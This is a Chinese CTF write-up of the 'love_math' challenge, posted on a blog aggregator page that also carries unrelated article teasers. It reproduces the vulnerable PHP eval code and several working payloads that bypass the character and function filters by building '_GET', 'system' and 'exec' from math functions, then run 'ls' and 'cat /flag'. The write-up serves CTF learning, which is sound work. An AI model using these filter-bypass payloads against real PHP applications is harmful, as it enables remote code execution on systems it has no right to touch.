news 2026/4/23 13:30:36

[CTF]攻防世界:love_math

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
[CTF]攻防世界:love_math

题目:[CTF]攻防世界:love_math

学习点:php的动态函数、默认函数名使用

<?phperror_reporting(0);//听说你很喜欢数学,不知道你是否爱它胜过爱flagif(!isset($_GET['c'])){show_source(__FILE__);}else{//例子 c=20-1$content=$_GET['c'];if(strlen($content)>=80){die("太长了不会算");}$blacklist=[' ','\t','\r','\n','\'','"','`','\[','\]'];foreach($blacklistas$blackitem){if(preg_match('/'.$blackitem.'/m',$content)){die("请不要输入奇奇怪怪的字符");}}//常用数学函数http://www.w3school.com.cn/php/php_ref_math.asp$whitelist=['abs','acos','acosh','asin','asinh','atan2','atan','atanh','base_convert','bindec','ceil','cos','cosh','decbin','dechex','decoct','deg2rad','exp','expm1','floor','fmod','getrandmax','hexdec','hypot','is_finite','is_infinite','is_nan','lcg_value','log10','log1p','log','max','min','mt_getrandmax','mt_rand','mt_srand','octdec','pi','pow','rad2deg','rand','round','sin','sinh','sqrt','srand','tan','tanh'];preg_match_all('/[a-zA-Z_\x7f-\xff][a-zA-Z_0-9\x7f-\xff]*/',$content,$used_funcs);foreach($used_funcs[0]as$func){if(!in_array($func,$whitelist)){die("请不要输入奇奇怪怪的函数");}}//帮你算出答案eval('echo '.$content.';');}

给出源代码,让你构造出方法来拿到flag,看到白名单和黑名单及字符80长度限制。


步骤

1、长度太短,考虑用**$_GET[x]**。

$blacklist = [' ', '\t', '\r', '\n','\'', '"', '`', '\[', '\]'];

[ ] 方括号被过滤,可以用{}尖括号代替。但是GET必须大写。

其中源代码中白名单函数可以利用的应该是base_convert函数,可以进行进制转换。

2、接下来考虑构造出$_GET[x]

现有:dechex (十进制转16进制) 还需要一个 16进制转ascii (hex2bin
通过base_convert十进制到36进制转换,得到hex2bin

总的payload:http://61.147.171.35:65356/?c=$pi=base_convert(37907361743,10,36)(dechex(1598506324));($$pi){pi}(($$pi){abs})&pi=system&abs=ls
解释:

  1. base_convert(37907361743,10,36) => “hex2bin”
  2. dechex(1598506324) => “5f474554” => hex2bin(5f474554) => _GET
  3. $pi=_GET;
  4. ($$pi){pi}(($$pi){abs}) => ($_GET){pi}($_GET){abs} //{}可以代替[]

ascii 转 16

16进制转10


3、执行命令拿到flag


其实还有许多中方法,以下参考学习:

1、

$pi=base_convert,$pi(696468,10,36)($pi(8768397090111664438,10,30)(){1})base_convert(696468,10,36)=>"exec"$pi(8768397090111664438,10,30)=>"getallheaders"exec(getallheaders(){1})//操作xx和yy,中间用逗号隔开,echo都能输出echo xx,yy

2、

//exec('hex2bin(dechex(109270211257898))') => exec('cat f*')($pi=base_convert)(22950,23,34)($pi(76478043844,9,34)(dechex(109270211257898)))//system('cat'.dechex(16)^asinh^pi) => system('cat *')base_convert(1751504350,10,36)(base_convert(15941,10,36).(dechex(16)^asinh^pi))

3、fuzz

<?php $payload=['abs','acos','acosh','asin','asinh','atan2','atan','atanh','bindec','ceil','cos','cosh','decbin','decoct','deg2rad','exp','expm1','floor','fmod','getrandmax','hexdec','hypot','is_finite','is_infinite','is_nan','lcg_value','log10','log1p','log','max','min','mt_getrandmax','mt_rand','mt_srand','octdec','pi','pow','rad2deg','rand','round','sin','sinh','sqrt','srand','tan','tanh'];for($k=1;$k<=sizeof($payload);$k++){for($i=0;$i<9;$i++){for($j=0;$j<=9;$j++){$exp=$payload[$k]^$i.$j;echo($payload[$k]."^$i$j"."==>$exp");echo"<br />";}}}http://XXX/?c=$pi=(is_nan^(6).(4)).(tan^(1).(5));$pi=$$pi;$pi{0}($pi{1})&0=system&1=cat%20/flag
版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/4/22 1:41:38

中小厂别再扛了!用 PLC 远程网关,1 人管 10 省8万年

中小机械厂、配件厂的老板们&#xff0c;是不是总被 PLC 运维逼到崩溃&#xff1f;客户设备在河南、湖北、四川&#xff0c;一台 PLC 报错&#xff0c;就得派唯一的电工师傅坐高铁赶过去&#xff0c;来回车票 住宿花 2000&#xff0c;耽误 2 天不说&#xff0c;厂里机器没人修…

作者头像 李华
网站建设 2026/4/23 13:30:34

快手AI的围城与重构

文&#xff5c;魏琳华编&#xff5c;王一粟年底似乎又到了AI厂商们展示实力的日子。上周&#xff0c;快手上演了一场为期五天的全能灵感周技术展示&#xff1b;本周&#xff0c;智谱的连续开源也如期而至。在这五天的时间内&#xff0c;快手带来了三个大模型、一个助力AI落地的…

作者头像 李华
网站建设 2026/4/18 2:32:51

123云盘解锁终极指南:一键开启完整会员功能

123云盘解锁终极指南&#xff1a;一键开启完整会员功能 【免费下载链接】123pan_unlock 基于油猴的123云盘解锁脚本&#xff0c;支持解锁123云盘下载功能 项目地址: https://gitcode.com/gh_mirrors/12/123pan_unlock 还在为123云盘下载速度慢而烦恼吗&#xff1f;想要免…

作者头像 李华
网站建设 2026/4/17 18:29:46

科研论文写作助手诞生记:Llama-Factory学术微调之路

科研论文写作助手诞生记&#xff1a;Llama-Factory学术微调之路 在高校实验室里&#xff0c;一位博士生正为撰写综述焦头烂额——文献浩如烟海&#xff0c;表达又需严谨规范。他尝试用通用大模型辅助写作&#xff0c;却发现生成内容空洞、术语混乱&#xff0c;甚至出现虚构引用…

作者头像 李华
网站建设 2026/4/23 10:35:14

NetGuard实战指南:告别流量偷跑,打造专属Android防火墙

你是否曾发现手机流量莫名减少&#xff1f;电池续航越来越短&#xff1f;应用广告频繁弹出&#xff1f;这些困扰着无数Android用户的痛点&#xff0c;其实可以通过一款名为NetGuard的开源工具轻松解决。无需root权限&#xff0c;无需复杂配置&#xff0c;让我们一起来探索这个强…

作者头像 李华